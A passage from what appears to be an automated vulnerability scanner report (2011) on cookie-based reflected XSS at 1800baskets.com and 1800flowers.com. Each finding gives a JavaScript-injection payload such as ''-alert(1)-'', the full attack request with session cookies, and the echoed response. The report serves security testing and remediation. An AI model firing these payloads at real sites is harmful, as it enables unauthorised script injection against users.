Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /product.do?baseCode=93260&dataset=11309 HTTP/1.1
Host: ww30.1800baskets.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800baskets.com/template.do?id=template3&page=2000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000MKdbdCo70zXsBXxIys-COzm:-1; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e6184c266'-alert(1)-'ef80968ac09; FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; __utmz=1.1304903358.1.1.utmcsr=ww30.1800flowers.com|utmccn=(referral)|utmcmd=referral|utmcct=/collection.do; __utma=1.534657557.1304903358.1304903358.1304903358.1; __utmc=1; __utmb=1.1.10.1304903358; cmTPSet=Y; CMAVID=70091303843240316067555; 87011923-VID=16601209214853; 87011923-SKEY=6825682268674136395; HumanClickSiteContainerID_87011923=STANDALONE; CoreAt=90074784=1|1|0|0|0|0|0|0|0|0|0|0|1|1304903358|1_|1561_&; cmRS=&t1=1304903358829&t2=1304903368545&t3=1304903441095&lti=1304903441095&ln=&hr=/product.do%3FbaseCode%3D93260%26dataset%3D11309&fti=&fn=searchform%3A0%3BUNDEFINED%3A1%3B&ac=&fd=&uer=&fu=&pi=18B%3Atemplate-The%20Popcorn%20Factory&ho=blooms.1800flowers.com/cm%3F&ci=90074784&ul=http%3A//ww30.1800baskets.com/template.do%3Fid%3Dtemplate3%26page%3D2000&rf=http%3A//ww30.1800flowers.com/collection.do%3Fdataset%3D10305

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:19:00 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 83754


                                                <html xmlns="http://www.w3.org/1999/xhtml"
    xmlns:og="http://ogp.me/ns#"
    xmlns:fb="http://www.face
...[SNIP]...
<!--

lpAddVars('visitor','VisitorID','aed35ad7-54a3-48bc-a8e0-0c9f3d76e6184c266'-alert(1)-'ef80968ac09');

lpAddVars('page','pageid','product');

//-->
...[SNIP]...
4.201. http://ww30.1800baskets.com/product.do [ShopperManagerEnterprise cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ww30.1800baskets.com
Path:   /product.do

Issue detail

The value of the ShopperManagerEnterprise cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a76bd'-alert(1)-'3d6fc46faa6e9ceca was submitted in the ShopperManagerEnterprise cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /product.do?delDateColl=&personalizable=false&submitForm=&personalComment=&personalCount=&generalProductDataset=11097&hospitalDataset=11096&funeralHomeDataset=11092&ruralRouteDataset=11093&dataset=11309&channel=&landing=&cm_cid=&sku=93260&quantity=1&recipient=-3&international=false&sympathy=false&zipCode=10010&recipientText=&recipient=-3&productType=GPT&locationCode=1&deliveryDate=Friday%2C+May.+20th&deliveryMonth=5&deliveryDay=20&deliveryYear=2011&baseCode=93260&actionEvent=upgrade&flexFlag=false&gptCode=geoSellCode&showAddon=&deliveryDateSelect=&setAlternates=&showAlternates=&contextPageType=PRODUCT&surchargeOnlyOptionId=&flexValue=&flexOptionId=&isGeoSell=false HTTP/1.1
Host: ww30.1800baskets.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800baskets.com/product.do?baseCode=93260&dataset=11309
Cache-Control: max-age=0
Origin: http://ww30.1800baskets.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618a76bd'-alert(1)-'3d6fc46faa6e9ceca; FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; __utmz=1.1304903358.1.1.utmcsr=ww30.1800flowers.com|utmccn=(referral)|utmcmd=referral|utmcct=/collection.do; cmTPSet=Y; CMAVID=70091303843240316067555; __unam=bbc31a8-12fd24e67c1-26d7039-1; __utma=1.534657557.1304903358.1304903358.1304903358.1; __utmc=1; __utmb=1.2.10.1304903358; 87011923-VID=16601209214853; 87011923-SKEY=6825682268674136395; HumanClickSiteContainerID_87011923=STANDALONE; JSESSIONID=0000jc-mR2VDw7uBY5v5sZbAO-H:-1; CoreAt=90074784=1|2|0|0|0|0|0|1|0|0|0|0|1|1304903358|1_|1561_&; cmRS=&t1=1304903446336&t2=1304903453532&t3=1304903458838&t4=1304903443093&lti=1304903458838&ln=verify&hr=javascript%3AcheckNSubmit%28false%29&fti=1304903458845&fn=searchform%3A0%3BproductForm%3A1%3Bsigninform%3A2%3Bfindgiftform%3A3%3BUNDEFINED%3A4%3B&ac=1:S&fd=1%3A22%3AlocationCode%3B&uer=&fu=/product.do&pi=PRODUCT%3A%20The%20Popcorn%20Factory%20Party%20Pup%20Snack%20Tin%20%2893260%29&ho=blooms.1800flowers.com/cm%3F&ci=90074784

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:29:00 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000XUNWu9J-txAe1nRFBC2FfiX:-1; Path=/
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 31981


           <html>
<head>

   <meta http-equiv="Pragma" content="no-cache">
   <meta http-equiv="Cache-Control" content="no-cache">
   <meta http-equiv="Expir
...[SNIP]...
<!--

lpAddVars('visitor','VisitorID','aed35ad7-54a3-48bc-a8e0-0c9f3d76e618a76bd'-alert(1)-'3d6fc46faa6e9ceca');

lpAddVars('page','pageid','shoppingbasket');

//-->
...[SNIP]...
4.202. http://ww30.1800baskets.com/shoppingbasket.do [ShopperManagerEnterprise cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ww30.1800baskets.com
Path:   /shoppingbasket.do

Issue detail

The value of the ShopperManagerEnterprise cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2533'-alert(1)-'2e3adfed67e was submitted in the ShopperManagerEnterprise cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /shoppingbasket.do HTTP/1.1
Host: ww30.1800baskets.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800baskets.com/product.do?baseCode=93260&dataset=11309
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618c2533'-alert(1)-'2e3adfed67e; FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; __utmz=1.1304903358.1.1.utmcsr=ww30.1800flowers.com|utmccn=(referral)|utmcmd=referral|utmcct=/collection.do; cmTPSet=Y; CMAVID=70091303843240316067555; __unam=bbc31a8-12fd24e67c1-26d7039-1; __utma=1.534657557.1304903358.1304903358.1304903358.1; __utmc=1; __utmb=1.2.10.1304903358; 87011923-VID=16601209214853; 87011923-SKEY=6825682268674136395; HumanClickSiteContainerID_87011923=STANDALONE; CoreAt=90074784=1|2|0|0|0|0|0|1|0|0|0|0|1|1304903358|1_|1561_&; cmRS=&t1=1304903446336&t2=1304903453532&t3=1304903458838&t4=1304903443093&lti=1304903458838&ln=verify&hr=javascript%3AcheckNSubmit%28false%29&fti=1304903458845&fn=searchform%3A0%3BproductForm%3A1%3Bsigninform%3A2%3Bfindgiftform%3A3%3BUNDEFINED%3A4%3B&ac=1:S&fd=1%3A22%3AlocationCode%3B&uer=&fu=/product.do&pi=PRODUCT%3A%20The%20Popcorn%20Factory%20Party%20Pup%20Snack%20Tin%20%2893260%29&ho=blooms.1800flowers.com/cm%3F&ci=90074784; JSESSIONID=0000a4jGFqAQQsPqkpo4AlBHArV:-1

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:20:34 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 31975


           <html>
<head>

   <meta http-equiv="Pragma" content="no-cache">
   <meta http-equiv="Cache-Control" content="no-cache">
   <meta http-equiv="Expir
...[SNIP]...
<!--

lpAddVars('visitor','VisitorID','aed35ad7-54a3-48bc-a8e0-0c9f3d76e618c2533'-alert(1)-'2e3adfed67e');

lpAddVars('page','pageid','shoppingbasket');

//-->
...[SNIP]...
4.203. http://ww30.1800baskets.com/shoppingbasket.do [ShopperManagerEnterprise cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ww30.1800baskets.com
Path:   /shoppingbasket.do

Issue detail

The value of the ShopperManagerEnterprise cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f8869'-alert(1)-'6549178ccfff42aec was submitted in the ShopperManagerEnterprise cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /shoppingbasket.do?actionEvent=PayPalCheckout&cartItem%280%29.type=0&cartItem%280%29.itemId=5687d050-633d-4bcd-8079-f1cfa4a09ce8&cartItem%280%29.groupId=0&cartItem%280%29.flexOption=&cartItem%280%29.zip=10010&cartItem%280%29.international=false&cartItem%280%29.deliveryMonth=5&cartItem%280%29.deliveryDay=19&cartItem%280%29.deliveryYear=2011&cartItem%280%29.deliveryDate=Thursday%2C+May+19%2C+2011&cartItem%280%29.quantity=1&cartItem%281%29.type=0&cartItem%281%29.itemId=13c7607a-55cd-4ea1-aee4-94efa0d7dd24&cartItem%281%29.groupId=1&cartItem%281%29.flexOption=&cartItem%281%29.zip=10010&cartItem%281%29.international=false&cartItem%281%29.deliveryMonth=5&cartItem%281%29.deliveryDay=20&cartItem%281%29.deliveryYear=2011&cartItem%281%29.deliveryDate=Friday%2C+May+20%2C+2011&cartItem%281%29.quantity=1&groupSize=2&cartItemsCount=2 HTTP/1.1
Host: ww30.1800baskets.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800baskets.com/shoppingbasket.do
Cache-Control: max-age=0
Origin: http://ww30.1800baskets.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618f8869'-alert(1)-'6549178ccfff42aec; FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; __utmz=1.1304903358.1.1.utmcsr=ww30.1800flowers.com|utmccn=(referral)|utmcmd=referral|utmcct=/collection.do; cmTPSet=Y; CMAVID=70091303843240316067555; __unam=bbc31a8-12fd24e67c1-26d7039-1; 87011923-VID=16601209214853; 87011923-SKEY=6825682268674136395; HumanClickSiteContainerID_87011923=STANDALONE; JSESSIONID=0000a4jGFqAQQsPqkpo4AlBHArV:-1; __utma=1.534657557.1304903358.1304903358.1304903358.1; __utmc=1; __utmb=1.3.10.1304903358; CoreAt=90074784=1|3|0|0|0|2|0|1|0|0|0|0|1|1304903358|1_|1561_&; cmRS=&t1=1304903463520&t2=-1&t3=1304903467089&t4=1304903461973&lti=1304903467089&ln=&hr=javascript%3AsetEvent%28PayPalCheckout%2CshoppingBasketForm%29&fti=1304903467576&fn=searchform%3A0%3BshoppingBasketForm%3A1%3BUNDEFINED%3A2%3B&ac=1:S&fd=&uer=&fu=/shoppingbasket.do&pi=18B%3Ao-Checkout%20-%20Shopping%20Basket%20Page&ho=blooms.1800flowers.com/cm%3F&ci=90074784

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:50:48 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 31981


           <html>
<head>

   <meta http-equiv="Pragma" content="no-cache">
   <meta http-equiv="Cache-Control" content="no-cache">
   <meta http-equiv="Expir
...[SNIP]...
<!--

lpAddVars('visitor','VisitorID','aed35ad7-54a3-48bc-a8e0-0c9f3d76e618f8869'-alert(1)-'6549178ccfff42aec');

lpAddVars('page','pageid','shoppingbasket');

//-->
...[SNIP]...
4.204. http://ww30.1800baskets.com/template.do [ShopperManagerEnterprise cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ww30.1800baskets.com
Path:   /template.do

Issue detail

The value of the ShopperManagerEnterprise cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2cd3a'-alert(1)-'94ea47eb64a was submitted in the ShopperManagerEnterprise cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /template.do?id=template3&page=2000 HTTP/1.1
Host: ww30.1800baskets.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/collection.do?dataset=10305
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000MKdbdCo70zXsBXxIys-COzm:-1; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e6182cd3a'-alert(1)-'94ea47eb64a; FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:17:14 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 37911


<html>
<head>

<meta http-equiv="Content-Type" content="text/html;charset=UTF-8">


<title></title>
<meta name="description" content="ThePopco
...[SNIP]...
<!--

lpAddVars('visitor','VisitorID','aed35ad7-54a3-48bc-a8e0-0c9f3d76e6182cd3a'-alert(1)-'94ea47eb64a');

lpAddVars('page','pageid','template');

//-->
...[SNIP]...
4.205. http://ww30.1800flowers.com/collection.do [ShopperManagerEnterprise cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ww30.1800flowers.com
Path:   /collection.do

Issue detail

The value of the ShopperManagerEnterprise cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 122aa'-alert(1)-'c02ab8e5310a2d560 was submitted in the ShopperManagerEnterprise cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /collection.do?dataset=10305&zipCode=10010&deliveryDate=May+19%2C+2011&locationType=1&actionEvent=filterCollection&isModalAllowed=1&deliveryDateFlag=N&deliveryMonth=05&deliveryDay=19&deliveryYear=2011&actionType=model HTTP/1.1
Host: ww30.1800flowers.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/collection.do?dataset=10305
Cache-Control: max-age=0
Origin: http://ww30.1800flowers.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618122aa'-alert(1)-'c02ab8e5310a2d560; __utmz=1.1304902847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cmTPSet=Y; CMAVID=70091303843240316067555; JSESSIONID=0000uX3-gHyeEcHw9aTrUn6TXJ9:-1; __utma=1.2024771767.1304902847.1304902847.1304902847.1; __utmc=1; __utmb=1.2.10.1304902847; CoreAt=90074784=1|2|0|0|0|0|0|0|0|0|0|0|1|1304902859|1_|1561_&; cmRS=&t1=1304902870973&t2=1304902875196&t3=1304902892073&t4=1304902867488&lti=1304902892072&ln=&hr=javascript%3AcheckNSubmitGNavModal%28filterCollection%2CguidedModelForm%29%3B&fti=1304902892082&fn=searchform%3A0%3BguidedCollectionForm%3A1%3BsortForm%3A2%3BUNDEFINED%3A3%3BguidedCollectionForm%3A4%3B&ac=4:S&fd=4%3A0%3AzipCode%3B4%3A2%3AlocationType%3B&uer=&fu=/collection.do%3Fdataset%3D10305&pi=d10305-Collection%20Page%20-%20Spring&ho=blooms.1800flowers.com/cm%3F&ci=90074784

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:12:49 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000Vdu2LusLHzfzpj67jImzBl4:-1; Path=/
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 74739


<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Cache-Control" content="no-cache">
<meta http-equiv="Expires" content="1">
<meta
...[SNIP]...
<!--

lpAddVars('visitor','VisitorID','aed35ad7-54a3-48bc-a8e0-0c9f3d76e618122aa'-alert(1)-'c02ab8e5310a2d560');

lpAddVars('page','pageid','collection');

//-->
...[SNIP]...
4.206. http://ww30.1800flowers.com/collection.do [ShopperManagerEnterprise cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ww30.1800flowers.com
Path:   /collection.do

Issue detail

The value of the ShopperManagerEnterprise cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a30d7'-alert(1)-'2e0123800e7 was submitted in the ShopperManagerEnterprise cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /collection.do?dataset=10305 HTTP/1.1
Host: ww30.1800flowers.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000oqktH2yyDUkrp5oGcWwUdty:-1; FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618a30d7'-alert(1)-'2e0123800e7; __utmz=1.1304902847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.2024771767.1304902847.1304902847.1304902847.1; __utmc=1; __utmb=1.1.10.1304902847; cmTPSet=Y; CMAVID=70091303843240316067555; CoreAt=90074784=1|1|0|0|0|0|0|0|0|0|0|0|1|1304902859|1_|1561_&; cmRS=&t1=1304902848067&t2=-1&t3=1304902867488&lti=1304902867488&ln=tab3p1_header&hr=/collection.do%3Fdataset%3D10305&fti=&fn=searchform%3A0%3Bfindgiftform%3A1%3BUNDEFINED%3A2%3B&ac=&fd=&uer=&fu=&pi=w-Welcome%20Page&ho=blooms.1800flowers.com/cm%3F&ci=90074784

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:06:04 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 77410


<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Cache-Control" content="no-cache">
<meta http-equiv="Expires" content="1">
<meta
...[SNIP]...
<!--

lpAddVars('visitor','VisitorID','aed35ad7-54a3-48bc-a8e0-0c9f3d76e618a30d7'-alert(1)-'2e0123800e7');

lpAddVars('page','pageid','collection');

//-->
...[SNIP]...
4.207. http://ww30.1800flowers.com/product.do [ShopperManagerEnterprise cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ww30.1800flowers.com
Path:   /product.do

Issue detail

The value of the ShopperManagerEnterprise cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6159f'-alert(1)-'cdaf5668b0f8fa9a7 was submitted in the ShopperManagerEnterprise cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /product.do?delDateColl=&personalizable=false&submitForm=&personalComment=&personalCount=&generalProductDataset=1011&hospitalDataset=10156&funeralHomeDataset=10216&ruralRouteDataset=10156&fagfDataset=11354&dataset=10305&channel=&landing=&cm_cid=d10305&sku=91637L&quantity=1&recipient=-3&international=false&sympathy=false&zipCode=10010&recipientText=&recipient=-3&locationCode=1&deliveryDate=Thursday%2C+May.+19th&deliveryMonth=5&deliveryDay=19&deliveryYear=2011&baseCode=91637&actionEvent=upgrade&flexFlag=false&gptCode=geoSellCode&showAddon=&deliveryDateSelect=&setAlternates=&showAlternates=&contextPageType=PRODUCT&surchargeOnlyOptionId=&flexValue=&flexOptionId=&isGeoSell=false&addOnProduct=&addOnQty=1&addOnProduct=&addOnQty=1&addOnProduct=&addOnQty=1&addOnProduct=&addOnQty=1 HTTP/1.1
Host: ww30.1800flowers.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/product.do?baseCode=91637&dataset=10305&cm_cid=d10305
Cache-Control: max-age=0
Origin: http://ww30.1800flowers.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
